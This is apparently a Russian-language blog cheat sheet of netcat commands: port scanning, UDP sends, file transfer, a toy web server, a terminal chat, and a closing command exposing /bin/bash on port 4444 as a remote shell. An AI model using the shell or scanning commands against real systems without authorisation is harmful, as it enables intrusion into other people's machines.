вторник, 25 марта 2025 г.

Чат для хакеров



Проверка наличия открытого TCP-порта 12345

nc -vn 192.168.1.100 12345



Сканирование TCP-портов с помощью netcat:

nc -vnz 192.168.1.100 20-24


При таком сканировании не будет соединение с портом, а только вывод успешного соединения:



Сканирование UDP-портов.

Для сканирования UDP портов с помощью nmap необходимы root привилегии. Если их нет — в этом случае нам тоже может помочь утилита netcat:

nc -vnzu 192.168.1.100 5550-5560



Отправка UDP-пакета

echo -n "foo" | nc -u -w1 192.168.1.100 161


Это может быть полезно при взаимодействии с сетевыми устройствами.



Прием данных на UDP-порту и вывод принятых данных

nc -u localhost 7777


После первого сообщения вывод будет остановлен. Если необходимо принять несколько сообщений, то необходимо использовать while true:


while true; do nc -u localhost 7777; done



Передача файлов. С помощью netcat можно как получать файлы, так и передавать на удаленный хост:


nc 192.168.1.100 5555 < 1.txt


nc -lvp 5555 > /tmp/1.txt



Netcact в роли простейшего веб-сервера.


Netcat может выполнять роль простейшего веб-сервера для отображения html странички.


while true; do nc -lp 8888 < index.html; done


C помощью браузера по адресу: http://хост netcat:8888/index.html. Для использования стандартного порта веб-сервера под номером 80 вам придется запустить nc c root привелегиями:


while true; do sudo nc -lp 80 < test.html; done



Чат между узлами


На первом узле (192.168.1.100):

nc -lp 9000


На втором узле:

nc 192.168.1.100 9000


После выполнения команд все символы, введенные в окно терминала на любом из узлов появятся в окне терминала другого узла.



Реверс-шелл

С помощью netcat можно организовать удобный реверс-шелл:

nc -e /bin/bash -lp 4444


Теперь можно соединиться с удаленного узла:

nc 192.168.1.100 4444


Комментариев нет:

Отправить комментарий

Split / разбить dump

//Разбить дамп по 50000 строк for i in `ls *.sql`; do split -d -l 50000 -a 4 --additional-suffix=.sql $i "$(basename "$i" .sq...